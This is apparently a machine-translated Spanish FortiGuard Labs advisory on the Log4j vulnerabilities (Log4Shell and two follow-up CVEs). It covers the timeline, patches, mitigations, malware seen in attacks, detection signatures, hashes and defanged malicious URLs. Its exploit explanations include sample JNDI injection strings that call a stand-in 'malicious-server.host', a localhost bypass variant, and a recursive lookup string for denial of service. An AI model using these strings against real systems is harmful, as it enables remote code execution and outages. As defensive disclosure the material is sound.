Actualizaciones críticas para vulnerabilidad de Apache Log4j

Informe de investigación de amenazas de FortiGuard Labs

Plataformas afectadas: 

Cualquier aplicación y servicio que use una versión vulnerable de Log4j2

Usuarios afectados: 

Cualquier organización que use una versión vulnerable de Log4j

Impacto:

Los atacantes remotos obtienen el control de los sistemas vulnerables.

Nivel de gravedad: Crítico

Vulnerabilidades Log4j

A partir del 9 de diciembre, la mayor parte del mundo conectado a Internet se vio obligado a enfrentarse a una nueva vulnerabilidad crítica descubierta en el marco Apache Log4j implementado en innumerables servidores. 

Con la etiqueta oficial CVE-2021-44228 , pero conocida coloquialmente como «Log4Shell», esta vulnerabilidad es trivial de explotar y permite la ejecución remota completa de código en un sistema de destino. 

Esto le ha valido a la vulnerabilidad una puntuación CVSS de 10, el máximo.

El 14 de diciembre , Apache Software Foundation reveló una segunda vulnerabilidad de Log4j ( CVE-2021-45046 ⁾

Inicialmente se identificó como una vulnerabilidad de denegación de servicio (DoS) con una puntuación CVSS de 3,7 y gravedad moderada. 

Las cosas fueron de mal en peor el 16 de diciembre debido al descubrimiento de filtraciones de información y la naturaleza de ejecución remota de código de la vulnerabilidad. 

Esto promovió que Apache actualizara el aviso y actualizara el puntaje CVSS para esta vulnerabilidad a 9.0.

El 18 de diciembre , se descubrió una tercera vulnerabilidad de ^Log4J ( CVE-2021-45105 :

Apache Log4j2 no siempre protege contra la recursividad infinita en la evaluación de búsqueda). 

Esta corrección se publicó en respuesta a una vulnerabilidad recientemente descubierta que hace que Log4j sea susceptible a un ataque de denegación de servicio (DoS).

El 19 de diciembre , se descubrió una variante «gusana» del malware Mirai IoT que incorporaba código de explotación para CVE-2021-44228 ^. 

Varias charlas en los canales OSINT han discutido si se trata de un «gusano».

Este blog describe lo que necesita saber acerca de las vulnerabilidades de Apache Log4j , incluidos los detalles, las campañas asociadas con Log4j y una supuesta variante de malware Mirai que se puede convertir en gusanos.

¿Qué es Log4j? Importancia de las vulnerabilidades de Log4j

Log4j es un marco de registro extensible basado en Java ampliamente utilizado por aplicaciones y servicios en todo el mundo ( lista CISA de software relacionado). 

A menudo, una dependencia de Log4j tendrá dos o tres capas de profundidad (una dependencia de una dependencia). 

La naturaleza omnipresente de Log4j es parte de lo que hace que CVE-2021-44228 sea tan peligroso. 

Millones de aplicaciones, como iCloud, Steam y Minecraft, usan Log4j para iniciar sesión. 

Un atacante simplemente necesita hacer que la aplicación registre una cadena especial para explotar con éxito esta vulnerabilidad.

El marco Log4j proporciona una interfaz con JNDI (Java Naming and Directory Interface), que permite una conexión a un servicio de directorio externo como LDAP (Lightweight Directory Access Protocol). 

Esto forma la base de varios intentos de explotación que se observan actualmente en la naturaleza, mediante los cuales las búsquedas JNDI inseguras potencialmente permiten que un atacante remoto no autenticado ejecute código arbitrario.

Curiosamente, el exploit inicial que aprovecha CVE-2021-44228 parece haberse creado antes de que se lanzara el parche. 

Según Cloudflare , el exploit se encontró el 1 de diciembre ^, nueve días antes del lanzamiento del parche. 

También es digno de mención que Minecraft fue el canario en la mina de carbón destacando el problema, ya que fue uno de los primeros servidores en ser atacado.

¿Qué pasó?

El 24 de noviembre , el equipo de seguridad en la nube de alibaba informó una vulnerabilidad crítica en Log4j a The Apache Software Foundation. 

En respuesta, Apache publicó una versión candidata el 6 de diciembre para abordar esta vulnerabilidad, que el equipo de seguridad en la nube de Alibaba consideró insuficiente. 

Antes de que Apache realizara la actualización necesaria, se publicó un tweet el 9 de diciembre ^, insinuando que abusar de JNDI Lookup en Log4j puede conducir a la ejecución remota de código. 

Esta publicación parece haber desencadenado una vorágine tanto en las comunidades de seguridad como de piratas informáticos.

Al día siguiente, Apache lanzó Log4j 2.15.0 como solución oficial. 

Alrededor de este tiempo, los atacantes comenzaron a detectar víctimas potenciales mediante la exploración de máquinas vulnerables. 

El mismo día, CISA publicó un aviso instando a los usuarios y administradores a actualizar Log4j a 2.15.0 lo antes posible. 

El aviso fue seguido por una página de orientación sobre vulnerabilidades de Apache Log4j que detalla el problema.

SANS luego movió su alerta de Infocon a amarillo por primera vez desde el infame brote de WannaCry en 2017.

Las alertas de Infocon pretenden reflejar cambios en el tráfico malicioso y la posibilidad de interrupción de la conectividad y se aplican a la condición de la infraestructura de Internet. 

Infocon solo se ha elevado previamente al estado amarillo para incidentes graves, como Heartbleed y Shellshock (ambos en 2014), lo que significa la gravedad de Log4Shell.

La situación empeoró el 14 de diciembre , cuando Apache lanzó Log4j ^2.16.0 debido a una solución insuficiente en la versión anterior. 

Esta segunda vulnerabilidad, etiquetada como CVE-2021-45046 (con una puntuación CVSS de 3,7), provoca una condición de denegación de servicio (DoS) cuando se aprovecha con éxito. 

Los actores de amenazas no perdieron el tiempo aprovechando Lo4Shell al implementar nuevo malware y programas potencialmente no deseados (PUA) para comprometer las máquinas vulnerables.

El 16 de diciembre , Apache actualizó la puntuación CVSS para CVE-2021-45046 de 3,7 a 9,0 ^. 

Investigaciones posteriores revelaron que se podía lograr una fuga de información y la ejecución remota de código en algunos entornos y la ejecución de código local en todos los entornos debido a una explotación exitosa. 

La gravedad también se cambió de moderada a crítica.

La versión 2.17.0 de Log4j se lanzó el 18 de diciembre ^en respuesta a otra vulnerabilidad de Log4j. 

Con la etiqueta CVE-2021-45105, el agujero de seguridad más reciente es una vulnerabilidad de denegación de servicio con una puntuación CVSS de 7,5 y Apache la califica como alta.

¿Cómo funciona el exploit – CVE-2021-44228?

1. Una vez que se ha seleccionado un objetivo, un atacante agrega una consulta JNDI a una solicitud de conexión a ese objetivo en un campo que probablemente se registre a través de Log4j. Por ejemplo: “$ {jndi:ldap://malicious-server.host/aaa} ”
2. Luego, una versión vulnerable de Log4j toma esa solicitud e intenta comunicarse con «malicious-server.host» con una consulta LDAP.
3. Si la conexión tiene éxito, el «servidor-malicioso.host» bajo el control del atacante responde a la consulta insertando una ubicación de archivo de clase Java malicioso en los datos del directorio.
4. La implementación de Java en el destino luego descarga el archivo de clase Java malicioso y lo ejecuta.

¿Cómo funciona el exploit de ejecución remota de código – CVE-2021-45046?

1. Una vez que se ha seleccionado un objetivo, un atacante agrega una consulta JNDI a una solicitud de conexión a ese objetivo en un campo que probablemente se registre a través de Log4j. Debido a la corrección de CVE-2021-44228 en Log3j 2.15.0, las consultas JNDI remotas ya no se permiten de forma predeterminada. Por lo tanto, esto se puede solucionar utilizando lo siguiente como ejemplo: “${jndi:ldap://127.0.0.1#malicious-server.host/aaa}”
2. La versión 2.15.0 de Log4j verá la solicitud como válida debido a que localhost está presente antes del «#»; sin embargo, el marco seguirá resolviendo la cadena completa e intentará ponerse en contacto con «malicious-server.host» con una consulta LDAP.
3. Si la conexión tiene éxito, el «servidor-malicioso.host» bajo el control del atacante responde a la consulta insertando una ubicación de archivo de clase Java malicioso en los datos del directorio.
4. La implementación de Java en el objetivo luego descargará el archivo de clase Java malicioso y lo ejecutará.

¿Cómo funciona el exploit de denegación de servicio (DoS) – CVE-2021-45105?

Esta vulnerabilidad no se considera parte de Log4Shell. 

Esto será más complejo de ejecutar porque un atacante necesitaría tener conocimiento y control sobre los comandos de búsqueda (por ejemplo, a través del mapa de contexto de subprocesos). 

La vulnerabilidad es una recursividad infinita, por lo que una explotación exitosa daría como resultado un ataque de denegación de servicio (DoS).

1. Para aprovechar esto, la aplicación vulnerable (o maliciosa) deberá usar una búsqueda de mapa de contexto con un diseño de patrón personalizado.
2. Una línea de registro se puede diseñar de tal manera que cuando se activa, se activa una condición de bucle infinito, creando así una denegación de servicio por agotamiento de los recursos.

por ejemplo, logger.info(«Ejemplo de línea de registro {}», «${${::-${::-$${::-j}}}}»);

¿Han aumentado los ataques que aprovechan CVE-2021-44228 y CVE-2021-45046?

^{FortiGuard Labs vio un aumento constante en la detección de ataques utilizando nuestra firma IPS, que cubre ambos CVE: » Apache.Log4j.Error.Log.Remote.Code.Execution} «, hasta el 15 de diciembre . 

¿Qué versiones de Log4j son vulnerables?

• CVE-2021-44228 : todas las versiones de Log4j de 2.0-beta9 a 2.12.1 y 2.13.0 a 2.14.1 (también incluye 2.15.0-rc1) son vulnerables.
• CVE-2021-45046 : Versiones de Log4j de 2.0-beta9 a 2.15.0
• CVE-2021-45105 : Versiones de Log4j de 2.0-beta9 a 2.16.0

¿Se han parcheado estas vulnerabilidades?

Sí, se recomienda a los usuarios de Java 8 o posterior que actualicen a Log4j 2.17.0 lo antes posible. 

Sin embargo, debido a que la solución ofrecida en 2.15.0 estaba incompleta, Apache lanzó las versiones posteriores de Log4j 2.16.0, 2.17.0, que se recomienda encarecidamente a los usuarios que apliquen.

Para Java 7, los usuarios deben actualizar a la versión 2.12.2.

¿El proveedor ha proporcionado mitigaciones?

Sí, Apache ha proporcionado la siguiente información de mitigación para Log4Shell (CVE-2021-44228):

Mitigación de Log4j 1.x: Log4j 1.x no tiene búsquedas, por lo que el riesgo es menor. 

Las aplicaciones que usan Log4j 1.x solo son vulnerables a este ataque cuando usan JNDI en su configuración. 

Se ha presentado un CVE independiente (CVE-2021-4104) para esta vulnerabilidad. 

Para mitigar: audite su configuración de registro para asegurarse de que no tenga JMSAppender configurado. 

Esta vulnerabilidad no afecta las configuraciones de Log4j 1.x sin JMSAppender.

Mitigación de Log4j 2.x: implemente una de las técnicas de mitigación a continuación.

Los usuarios de Java 8 (o posterior) deben actualizar a la versión 2.16.0.

Los usuarios que requieran Java 7 deben actualizar a la versión 2.12.2 cuando esté disponible (trabajo en progreso, se espera que esté disponible pronto).

De lo contrario, elimine la clase JndiLookup del classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Tenga en cuenta que esta vulnerabilidad solo afecta al archivo JAR log4j-core. 

Las aplicaciones que utilizan solo el archivo JAR log4j-api sin el archivo JAR log4j-core no se ven afectadas por esta vulnerabilidad.

Apache ha proporcionado la siguiente información de mitigación para CVE-2021-45046:

Mitigación de
Log4j 1.x Log4j 1.x no se ve afectado por esta vulnerabilidad.

Mitigación Log4j 2.x
Implemente una de las siguientes técnicas de mitigación:

Los usuarios de Java 8 (o posterior) deben actualizar a la versión 2.16.0.

Los usuarios de Java 7 deben actualizar a la versión 2.12.2.

De lo contrario, en cualquier versión que no sea 2.16.0, puede eliminar la clase JndiLookup de classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Los usuarios son Se recomienda no habilitar JNDI en Log4j 2.16.0. 

Si se requiere JMS Appender, use Log4j 2.12.2.

Tenga en cuenta que esta vulnerabilidad solo afecta al archivo JAR log4j-core. 

Las aplicaciones que utilizan solo el archivo JAR log4j-api sin el archivo JAR log4j-core no se ven afectadas por esta vulnerabilidad.

Además, tenga en cuenta que Apache Log4j es el único subproyecto de Logging Services afectado por esta vulnerabilidad. 

Esto no afecta a otros proyectos como Log4net y Log4cxx.

Apache ha proporcionado la siguiente información de mitigación para CVE-2021-45105:

Mitigación de
Log4j 1.x Log4j 1.x no se ve afectado por esta vulnerabilidad.

Mitigación Log4j 2.x
Implemente una de las siguientes técnicas de mitigación:

Los usuarios de Java 8 (o posterior) deben actualizar a la versión 2.17.0. 

Alternativamente, esto se puede mitigar en la configuración:

En PatternLayout en la configuración de registro, reemplace las búsquedas de contexto como ${ctx:loginId} o $${ctx:loginId} con patrones de asignación de contexto de subprocesos (%X, %mdc o %MDC).

De lo contrario, en la configuración, elimine las referencias a las búsquedas de contexto como ${ctx:loginId} o $${ctx:loginId} donde se originan desde fuentes externas a la aplicación, como encabezados HTTP o entrada del usuario.

Tenga en cuenta que esta vulnerabilidad solo afecta al archivo JAR log4j-core. 

Las aplicaciones que utilizan solo el archivo JAR log4j-api sin el archivo JAR log4j-core no se ven afectadas por esta vulnerabilidad.

Además, tenga en cuenta que Apache Log4j es el único subproyecto de Logging Services afectado por esta vulnerabilidad. 

Esto no afecta a otros proyectos como Log4net y Log4cxx.

¿Fortinet protege contra intentos de explotación?

Sí, Fortinet lanzó la firma IPS «Apache.Log4j.Error.Log.Remote.Code.Execution», con VID 51006 para bloquear intentos de explotación para CVE-2021-44228 y CVE-2021-45046. 

Esta firma se publicó inicialmente en el paquete IPS versión 19.215. 

FortiGuard Labs proporciona la firma IPS «Apache.Log4j.Error.Log.Thread.Context.DoS» contra CVE-2021-45105.

¿Qué malware y aplicaciones potencialmente no deseadas (PUA, por sus siglas en inglés) se observaron que se implementaron a través de ataques que aprovechaban Log4Shell?

Se informa que malware como Khonsari ransomware, Kinsing, Mirai, Muhstik, Elknot, m8220, Orcus RAT, XMRig, SitesLoader y Nanocore RAT se entregaron en estos ataques posteriores. 

También se publicó un video que muestra que es posible ejecutar el juego de disparos en primera persona Doom en un servidor de Minecraft abusando de la vulnerabilidad.

A continuación, se incluyen breves descripciones de cada tipo de malware:

Ransomware Khonsari

Khonsari es un ransomware que cifra archivos en carpetas específicas en máquinas comprometidas y exige un rescate para descifrarlos. 

Se llama Khonsari porque agrega la extensión de archivo .khonsari a los archivos que encripta.

parentesco

Kinsing es un malware escrito en Go que ejecuta un criptominero e intenta propagarse dentro del entorno comprometido. 

Kinsing existe desde enero de 2020.

Mirai

Mirai es un malware de arquitectura múltiple basado en Linux. 

Implementado inicialmente en dispositivos de red expuestos, se usa cada vez más contra dispositivos IoT (Internet de las cosas). 

Una vez infectado, un dispositivo comprometido se convierte en un bot que es absorbido por una botnet (una colección de bots). 

Estas botnets se utilizan principalmente para ataques de denegación de servicio distribuido (DDoS).Figura 3. El dominio ‘nazi.uy’ es un indicador de Mirai

FortiGuard Labs publicó previamente blogs sobre el malware Mirai:

• La campaña basada en MANGA, también conocida como Dark Mirai, apunta a la nueva vulnerabilidad RCE del enrutador TP-Link
• Los fantasmas de Mirai
• Mirai Botnet: proteja su infraestructura con FortiDDoS

alce

También conocido como BillGates, inicialmente solo era un malware basado en Linux. 

Sin embargo, desde entonces ha sido portado a Windows. 

El malware se utiliza para lanzar ataques de denegación de servicio distribuido (DDoS).Figura 4. Binario de Elknot con nombres de funciones. 

CAttackCompress es el comando de ataque más utilizado

m8220

m8220 es una botnet de minería para plataformas Windows y Linux.Figura 5. M8220 intenta propagarse a través de SSH analizando la carpeta del usuario y el historial de bash en busca de nombres de usuario, contraseñas y claves SSH.

Muhstik

Muhstik es un malware de Linux que convierte una máquina comprometida en un bot y se sabe que aprovecha las vulnerabilidades para propagarse. 

Una de las vulnerabilidades notables explotadas por Muhstik es Atlassian.Confluence.CVE-2021-26084.Remote.Code.Execution (CVE-2021-26084).

FortiGuard Labs publicó previamente un blog en Muhkstik:

• Un ataque reciente utiliza una vulnerabilidad en el servidor Confluence

rata orcus

Orcus es un troyano de acceso remoto (RAT) que ha sido muy publicitado y vendido en foros clandestinos desde al menos 2016.

Aunque un desarrollador de software canadiense fue arrestado por crear y vender RAT en 2019, Orcus RAT se usa hoy como su código fuente. se filtró Como RAT, realiza varias acciones en una máquina comprometida a través de comandos recibidos de su servidor de Comando y Control (C&C).

Cargador de sitios

El cuentagotas de script de shell a continuación descarga un binario Go empaquetado con UPX desde http://103.104.73.155:8080/index . 

Este binario también es un criptominero XMRig.Figura 6. Dropper de SitesLoader, descargando el minero XMRig desde 103.104.73.155.

XMRig

XMRig es un software de criptominería de código abierto que se utiliza para extraer la criptomoneda Monero. 

Si bien XMRig es un software legítimo, los actores de amenazas a menudo abusan de él para extraer ilegalmente Monero en la máquina comprometida.Figura 7. Descargando y ejecutando xmrig.exe.

RATA de nanonúcleo

Nanocore es un troyano de acceso remoto (RAT) modular que existe desde 2013.

El RAT estaba disponible para su compra y las versiones descifradas se filtraron en línea. 

Nanocore realiza actividades típicas de RAT en la máquina comprometida, como la filtración de datos, el registro de teclas, el secuestro de cámaras web y la captura de capturas de pantalla.

¿Algún malware ha incorporado los exploits recientes de Log4j para su propagación?

FortiGuard Labs tiene conocimiento de un informe en línea de que una variante de Mirai realiza la propagación al explotar la vulnerabilidad Log4Shell como tal, es un gusano.

Nuestro análisis concluye que esta variante de Mirai está equipada con el exploit Log4Shell y CVE-2017-17215 , una vulnerabilidad de ejecución remota de código en los enrutadores Huawei HG532, y no presenta una funcionalidad similar a la de un gusano.

Entonces, si bien nuestros hallazgos revelan que, como un gusano, puede propagarse, lo que hace que no sea un gusano es que el botmaster controla todas las instrucciones. 

Esto se debe a que depende de un recurso externo para la propagación y la instrucción. 

El botmaster también tiene el lujo de activar y desactivar los escaneos.

FortiGuard Labs detecta esta variante de Mirai por AV como ELF/Mirai.VI!tr.

FortiGuard Labs brinda cobertura IPS contra CVE-2017-17215 como «Huawei.HG532.Remote.Code.Execution».

Para FortiEDR, todas las muestras conocidas se agregaron a nuestra inteligencia en la nube y se bloquearán si se ejecutan.

¿Fortinet ha publicado alguna publicación sobre las vulnerabilidades recientes de Log4j?

Sí, Fortinet ha lanzado varias publicaciones desde que salió a la luz el tema. 

A continuación se muestra la lista de publicaciones publicadas:

• Vulnerabilidad Log4j2 (alerta de brote)
• Vulnerabilidad de ejecución remota de código Apache Log4J (CVE-2021-44228) (señal de amenaza)
• Nueva vulnerabilidad de Log4j (CVE-2021-45046) da como resultado una denegación de servicio (señal de amenaza)
• Log4j 2.17.0 lanzado en respuesta a la nueva vulnerabilidad de Log4j (CVE-2021-45105) (señal de amenaza)
• Malware Mirai que supuestamente se propaga usando Log4Shell detectado en estado salvaje (señal de amenaza)
• Sustitución de mensajes de registro de Apache log4j2 (CVE-2021-44228) (aviso de PSIRT)
• CVE-2021-44228: Vulnerabilidad de Apache Log4j (blog de PSIRT)
• Apache.Log4j.Error.Log.Remote.Code.Execution (Enciclopedia de amenazas)
• Consejo técnico: cómo FortiEDR protege contra la explotación de Log4shell (FortiEDR)

Conclusión

Las vulnerabilidades de Log4j tuvieron un impacto global significativo similar a las principales amenazas anteriores, como Wannacry, Heartbleed y Shellshock. 

Debido a que se implementa tan ampliamente, se espera que los efectos secundarios de esta vulnerabilidad duren algún tiempo, ya que muchas aplicaciones empresariales y servicios en la nube requieren actualización. 

Si bien el mundo aún no ha visto ningún evento masivo de entrega de malware (es decir, un gran brote de ransomware, eventos de gusanos) que aprovechen las vulnerabilidades de Log4j, la historia nos dice que no bajemos la guardia, especialmente desde la temporada navideña, cuando los actores de amenazas generalmente volverse más activo, se acerca rápidamente.

FortiGuard Labs continuará monitoreando activamente la situación para obtener más información y brindar información adicional sobre las protecciones a medida que estén disponibles.

Protecciones y mitigaciones de Fortinet

FortiGuard Labs proporciona las siguientes firmas IPS contra CVE-2021-44228 (Log4Shell), CVE-2021-45046 y CVE-2021-45105:

Apache.Log4j.Error.Log.Remote.Code.Execution (CVE-2021-44228 y CVE-2021-45046)
Apache.Log4j.Error.Log.Thread.Context.DoS (CVE-2021-45105)

Visite Outbreak Alert para obtener más información sobre cómo Fortinet protege a los usuarios de Log4Shell.

FortiGuard Labs proporciona la siguiente protección AV contra malware, programas potencialmente no deseados (PUA) y otros archivos involucrados como los siguientes:

MSIL/Filecoder.ANF!tr.ransom (Khonsari ransomware)
BASH/CoinMiner.RZ!tr (identificación)
ELF/CoinMiner.CFA!tr (identificación)
ELF/Ganiw.A!tr (Elknot)
Linux/Mirai.B!tr .bdr (Mirai)
Linux/Tsunami.NCD!tr (Mirai)
Adware/Tsunami (Mirai)
ELF/DDoS.CIA!tr (Muhstik)
BASH/Miner.BO!tr.dldr (m8220)
Java/khonsari.DF40!tr (Orcus RAT)
BASH/Miner.UF!tr (SitesLoader)
Adware/Miner (SitesLoader)
BASH/Agent.ACA8!tr.dldr
Riskware/CoinMiner.PO (XMRig)
Riskware/CVE202144228 (XMRig)BAT/Agent.Q!tr .dldr (XMRig)
W32/GenKryptik.FBSU!tr (rata de nanonúcleo)

Todos los IOC de la red están bloqueados por el cliente WebFiltering.

Además, FortiGuard Labs brinda la siguiente cobertura AV contra variantes anteriores de malware que se entregan a través de Log4Shell: 

Kinsing
BASH/Agent.KG!tr
BASH/CoinMiner.AKT!tr
BASH/Miner.DB!tr
W64/CoinMiner.QG!tr
BASH/CoinMiner.RZ!tr

Mirai
ELF/Mirai.[alfabetos aleatorios]
ELF/Mirai.[alfabetos aleatorios]!tr
Linux/Mirai[alfabetos aleatorios]!tr

Elknot
Linux/Elknot.[alfabetos aleatorios]!tr
ELF/Elknot.[alfabetos aleatorios]!tr

Orcus RAT
W32/OrcusRAT.[alfabetos aleatorios]
W32/Orcus.[alfabetos aleatorios]!tr
W32/Orcus.[alfabetos aleatorios]!tr.bdr

Muhstik
ELF/DDoS.CIA!tr
BASH/Agent.MQ!tr
Adware/Tsunami
ELF/CoinMiner.CFA!tr
ELF/BitCoinMiner.HF!tr
BAT/Starter.NZ!tr
BASH/CoinMiner.RZ!tr

XMRig
W32/XMRigMiner
Riskware/XMRig_Miner
W32/XMRig_Miner.[alfabetos aleatorios]!tr
Riskware/XMRigCoinMiner
W32/XMRig_Miner.[alfabetos aleatorios]
Linux/XMrig.[alfabetos aleatorios]!tr.dldr
MSIL/XMRig_Miner.VC!tr
W32/XMRigMiner .WIN64!tr
W64/XMRigMiner.WIN64!tr
W32/XMRig_Miner.ELF64!tr
W32/XMRig_Miner.SMBM4!tr

Nanocore RAT
W32/Backdoor_MSIL_NANOCORE.BA!tr
W32/NANOCORE.[alfabetos aleatorios]!tr.bdr
W32/NanoCore.[alfabetos y números aleatorios]!tr
Data/Nanocore.[alfabetos aleatorios!tr
W32/Backdoor_MSIL_NANOCORE.SMIL
MSIL/NanoCore .[Alfabetos y números aleatorios]!tr
Adware/NanoCore
Adware/Backdoor_MSIL_NANOCORE

Apache también ha brindado consejos de mitigación para los usuarios de versiones anteriores, como se describe anteriormente.

IOC SHA-256 Hash

• f2e3f685256e5f31b05fc9f9ca470f527d7fdae28fa3190c8eba179473e20789 (Khonsari ransomware)
• 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b (Kinsing)
• 7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512 (Kinsing)
• 8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef (Kinsing)
• bcfdddb033fb1fa9c73e222919ecd4be071e87b0c54825af516b4f336bc47fa2 (Elknot)
• 0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049 (Mirai)
• 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d (Mirai)
• 2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec (Mirai)
• 15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b (Muhstik)
• 10fad59b071db09aafcb7f40e775f28180aed182786557e9ee7f2f2e332b4513 (m8220)
• 86fc70d24f79a34c46ef66112ef4756639fcad2f2d7288e0eeb0448ffab90428 (Orcus RAT)
• e7c5b3de93a3184dc99c98c7f45e6ff5f6881b15d4a56c144e2e53e96dcc0e82 (SitesLoader)
• f059246cea87a886acb1938809cf4a1152247a5b5a2df0b1bf64c46a0daccbcc (SitesLoader)
• 3e6567dab5e7c7c42a02ac47e8c68f61c9c481bbbbe5ddb1c68e86f7370dab45 (XMRig)
• 95ac2e2cd2caf30829a9588988601067a98f9bb02e0776a8ef2b813f9b4d8992 (XMRig)
• e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1 (XMRig)
• bd5006ba4e4cfcf8a8b0b6da5bb30f4dd8a78beb351b814431ae8599dcf23f1b (Nanocore RAT)
• e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273 (variante Mirai con presunta capacidad de gusano)

URL
3[.]145.115.94/zambo/groenhuyzen[.]exe
3[.]145.115.94/zambos_caldo_de_p.txt
hxxp://3[.]145.115.94/main.class
hxxp://45[.] 137.155.55/kining
hxxp://45[.]137.155.55/kinsing2
hxxp://80[.]71.158.12/kinsing
hxxp://80[.]71.158.44/kinsing
hxxp://82[ .]118.18.201/kining
hxxp://92[.]242.40.21/kinsing
hxxp://93[.]189.42.8/kinsing
hxxp://92[.]242.40.21/lh2.sh
hxxp: //45[.]137.155.55/ex.sh
hxxp://155[.]94.154.170/aaa
hxxp://138[.]197.206.223/wp-content/themes/twentysixteen/dk86
hxxp:/ /34[.]221.40.237/.x/pty5
hxxp://34[.]221.40.237/.x/pty9
nazi[.]uy
hxxp://agente[.]apacheorg.xyz:1234/v
hxxp://185[.]250.148.157:8005/index
hxxp://103[.]104.73.155:8080/acc
hxxp://129[.]226.180.53/xmrig_setup/raw/master/setup_c3pool_miner. sh
hxxp://descargar[.]c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
hxxp://54[.]210.230.186/wp-content/themes/twentyfourteen/xmrig.exe
hxxp://198 [.]98.60.67/bins/x86
hxxp://198.98.60.67/bins/arm
hxxp://198.98.60.67/lh.sh

Contacta con nosotros para obtener más información sobre la organización de investigación e inteligencia de amenazas, FortiGuard Labs de Fortinet y la cartera de servicios o suscripciones de seguridad de FortiGuard con Teleinfo.